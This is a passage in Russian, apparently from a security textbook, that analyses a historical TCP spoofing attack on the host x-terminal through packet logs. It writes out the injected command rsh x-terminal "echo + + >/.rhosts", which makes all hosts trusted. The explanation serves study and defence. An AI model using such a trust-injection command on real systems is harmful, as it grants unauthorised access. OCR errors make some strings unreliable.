данными, содержащими верные значения АСК, на x-tei-minal. Далее он. посылает следующие пакеты:
14:18:37.265404 server.login > x-terminal.shell: P 0:2(2) ack 1 win 4096
14:18:37.775872 server.login > x-terminal.shell: P 2:7(5) ack 1 win 4096
14:18:38.287404 server.login > x-terminal.shell: P 7:32(25) ack 1 win 4096
что означает выполнение команды server^ rsh x-terminal "echo + + >/.rhosts".
- -----------------------------------------------------------------------
I Завершая атаку, взломщик от имени server, login посылает на ^^J^ x-terminal.sheU три пакета, что
эквивалентно выполнению на хосте server следующей г-команды: rsh x-terminal. "echo + + >/.rhosts". Эта
команда дописывает в файл /.rhosts строчку + + и делает доверенными все станции.
Всего атака заняла менее 16 секунд. Атакующий закрывает ложное соединение:
14:18:41.347003 server, login > x-terminal.shell: . ack 2 win 4096
14:18:42.255976 server.login > x-terminal.shell: . ack 3 win 4096
14:18:43.165674 server.login > x-terminal.shell: F 32:32(0) ack 3 win 4096
14:18:52.179922 server.login > x-terminal.shell: R 1382727043:1382727043(0) win 4096
14:18:52.236452 server.l'ogin > x-terminal.shell: R 1382727044:1382727044(0) win 4096